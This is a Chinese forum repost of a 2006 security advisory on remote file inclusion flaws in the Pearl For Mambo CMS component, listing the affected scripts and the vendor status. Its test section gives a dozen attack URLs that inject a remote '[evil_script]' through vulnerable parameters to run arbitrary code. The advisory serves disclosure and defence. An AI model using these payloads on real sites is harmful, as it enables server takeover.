‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]Pearl For Mambo多个远程文件包含漏洞

睡猫

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛首席贵宾

帖子
829 
精华
6 
积分
8724 
阅读权限
100 
性别
女 
来自
火星 
在线时间
610 小时 
注册时间
2011-7-29 
最后登录
2008-1-17 
楼主 发表于 2006-6-28 20:20  只看该作者

[转载]Pearl For Mambo多个远程文件包含漏洞

信息来源:绿盟科技

发布日期:2006-06-27
更新日期:2006-06-27

受影响系统:
Pearlinger Pearl For Mambo <= 1.6
描述:
--------------------------------------------------------------------------------
Mambo是免费的功能强大的开放源码内容管理系统,Pearl For Mambo是可以无缝的集成于Mambo的一个组件。

Pearl For Mambo允许远程攻击者使用phpbb_root_path或GlobalSettings[templatesDirectory]参数向多个脚本发送特制的URL请求,导致指定远程系统的恶意文件,在有漏洞的系统上执行任意代码。

以下脚本受这个漏洞影响:

includes/functions_cms.php
includes/adminSensored.php
includes/adminBoards.php
includes/adminAttachments.php
includes/adminAvatars.php
includes/adminBackupdatabase.php
includes/adminBanned.php
includes/adminForums.php
includes/adminPolls.php
includes/adminSmileys.php
includes/poll.php
includes/move.php

<*来源:Kw3rLn (ciriboflacs@YaHoo.Com
  
  链接:http://www.milw0rm.com/exploits/1956
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]
http://www.site.com/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]

建议:
--------------------------------------------------------------------------------
厂商补丁:

Pearlinger
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.pearlinger.com/

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题